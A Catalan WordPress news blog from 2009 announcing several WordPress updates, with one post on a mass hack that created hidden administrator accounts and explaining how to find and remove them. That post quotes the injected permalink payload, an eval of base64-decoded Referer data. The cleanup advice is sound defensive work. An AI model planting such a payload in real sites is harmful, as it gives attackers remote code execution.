Rss Feed
Tweeter button
Facebook button
Technorati button
Reddit button
Myspace button
Linkedin button
Webonews button
Delicious button
Digg button
Stumbleupon button
Newsvine button
Youtube button

Actualitzacions

WordPress 2.9

Ja està disponible la versió 2.9 del WordPress. Podeu actualitzar des del vostre panell d’administració o descarregant-la des d’aquí.

Compte! Alguns usuaris han reportat errors en algunes instal·lacions a l’hora d’actualitzar a la versió en castellà del WordPress 2.9. El problema, però, hauria d’estar solucionat.

Us deixem aquí un llistat de noves funcionalitats del WordPress 2.9 i canvis d’aquesta versió escrit per CODIC fa uns dies:

  • Possibilitat d’incloure i excloure elements a una galeria d’imatges
  • Els articles, les pàgines, els comentaris i els adjunts podran ser enviats a una paperera, enlloc d’esborrats, i recuperats més tard.
  • Els usuaris podran ser enregistrats via crida XMLRPC, això vol dir que podrem integrar wordpress amb altres productes que demanaran via una crida d’xml via http (com un web service) de crear d’alta un usuari.
  • L’eina d’importació i exportació reconeixerà i suportarà els articles permanents a la plana principal (sticky).
  • Per al tema per defecte (kubrick) es permet definir l’amplada i es permeten comentaris a les pàgines.
  • Edició d’imatges.
  • Noves funcionalitats de plantilles (templates).
  • Solució d’errors en Safari, en publicar, errors en l’ordre de comentaris, en descarregar els arxius annexes APP (Atom)
  • Millores a nivell de SEO rel.
  • S’elimina el suport per a MySql 4.0, i el mínim requerit per a funcionar serà MySql 4.1.2.

A AyudaWordPress teniu una llista de canvis encara més llarga.

dilluns, 21 de desembre del 2009 per JoTGi Actualitzacions, WordPress 2.9 Encara no hi ha cap comentari

WordPress 2.8.6

Ja tenim l’actualització a WordPress 2.8.6 disponible des dels nostres Taulers d’administració, que solucions problemes greus, com per exemple una vulnerabilitat XSS en la utilitat de “Publica això” o un problema de càrrega d’arxius, relacionat amb els noms, que podria provocar certes vulnerabilitats en depén de quines configuracions d’Apache.

Més informació [anglès] Descàrrega [català] Descàrrega [anglès]

dilluns, 16 de novembre del 2009 per JoTGi Actualitzacions, WordPress 2.8 Només hi ha un comentari

WordPress 2.8.5, actualització de seguretat

Com ja han dit a Codi Ç, acaba d’alliberar-se la versió 2.8.5 de WordPress. És una actualització de seguretat urgent, del problema sobre el qual us vam parlar l’altre dia, i inclou un canvi que podria comprometre la seguretat i dos canvis menors. Els canvis són els següents:

  • Eliminació de l’evaluació de la funció permalink_structure.
  • Eliminació d’algunes crides a create_function() que estaven duplicades i carregàven el sistema.
  • Pedaç per a evitar la denegació de servei (DOS) utilitzant trackbacks.
  • Eliminació de la pujada d’arxius de forma no filtrada. Es pot activar manualment.
  • Afegides algunes seqüències d’escapament (formateig de cadenes de caràcters) per tal d’evitar errors.
  • Retirada de dos importadors antics. Un d’ells l’antic fetch_rss().
  • Solució d’altres petits problemes.

Podeu trobar una explicació detallada sobre l’actualització del WordPress a la versió 2.8.5 a Maestros del Web. Us en recomanem l’actualització com abans millor, utilitzant l’autoactualitzador del vostre WordPress.

Com a mesura extra, podeu passar el WordPress Exploit Scanner, una extensió que revisa tant base de dades com arxius de la nostra instal·lació de WordPress per tal d’eliminar codi sospitós.

Nosaltres ja hem actualitzat, i en principi tot funciona correctament. De tota manera, si veieu alguna cosa rara, ja sabeu ;-)

dimecres, 21 de octubre del 2009 per JoTGi Actualitzacions, WordPress 2.8 Encara no hi ha cap comentari

Canvis en els enllaços permanents i administradors fantasma

Fa uns dies hi va haver un hackeig massiu de blocs amb WordPress, fins i tot aquells que estaven actualitzats a la darrera versió (2.8.4). Els atacants aprofitaren un forat de seguretat per a fer una injecció SQL per tal de crear nous administradors, i aixi tenir accés total als blocs. Un cop aconseguit això, canviaven els enllaços permanents a una cosa semblant a això:

http://elmeubloc.cat/la-meva-entrada/${eval(base64_decode($_SERVER[HTTP_REFERER]))}

No és gaire fàcil adonar-se’n, però per comprovar si heu etsta hackejats comproveu els enllaços permanents. Si han canviat, la primera cosa que hauríeu de fer és eliminar l’administrador creat pels atacants. No el podreu veure (és un usuari fantasma), però sabreu que hi és perquè el comptador d’usuaris administradors no es correspondrà amb el nombre d’usuaris que veureu. Per tal d’eliminar-lo, editeu l’últim usuari creat al bloc i copieu l’URL on esteu:

http://elmeubloc.cat/wp-admin/user-edit.php?user_id=4&wp_http_referer=%2Fwp-admin%2Fusers.php

En l’exemple, l’últim usuari creat té la ID 4. Per tal d’eliminar aquest administrador fantasma, simplement canviem aquest 4 per un 5, és a dir, l’usuari administrador serà, segurament, l’últim en ser creat i, per tant, tindrà una ID que segueix al darrer que veiem nosaltres. Per eliminar-lo, cal donar-li una adreça electrònica (fictícia).

Per tornar a l’estructura d’enllaços permanents que teníeu, simplement aneu a Opcions -> Enllaços Permanents i elimineu la part de ${eval(base64_decode($_SERVER[HTTP_REFERER]))}.

Una altra manera de trobar els administradors fantasma és fent servir l’extensió que ha creat Sumolari. Només cal dir-li quants usuaris administradors tenim, i ell solet ens donarà una llista dels possibles administradors fantasma. Cal tenir en compte, però, que si nosaltres afegim més tard un altre administrador, l’extensió també el marcarà com a possible fantasma.

Una vegada haguem solucionat això, el que s’ha de comprovar és si tenim arxius que no haurien de ser a la nostra instal·lació de WordPress. També es pot reinstal·lar el WordPress si abans esborreu tots els arxius de totes les carpetes, excepte la de wp-content… Però això ja és una decisió personal.

diumenge, 06 de setembre del 2009 per Administrador Actualitzacions, Novetats, Seguretat, WordPress 2.8 Només hi ha un comentari

WordPress 2.8.3, actualització de seguretat.

L’altre dia (perdoneu el retard, estem de vacances ^^) va sortir la versió 2.8.3 de WordPress, que soluciona alguns bugs i problemes de seguretat importants. Podeu descarregar-la des de WordPress | Català o actualitzar automàticament el vostre WordPress.

dissabte, 08 de agost del 2009 per JoTGi Actualitzacions, Novetats, WordPress 2.8 Encara no hi ha cap comentari
« Entrades anteriors

Subscriu-te al feed!

Saps que només hi ha 56 persones que ens llegeixen a través del RSS?
Fes-ho tu també!

Descàrregues de WordPress

WordPress ha estat descarregat vegades en anglès. El vols en català?

Entrades Populars

Categories

Arxiu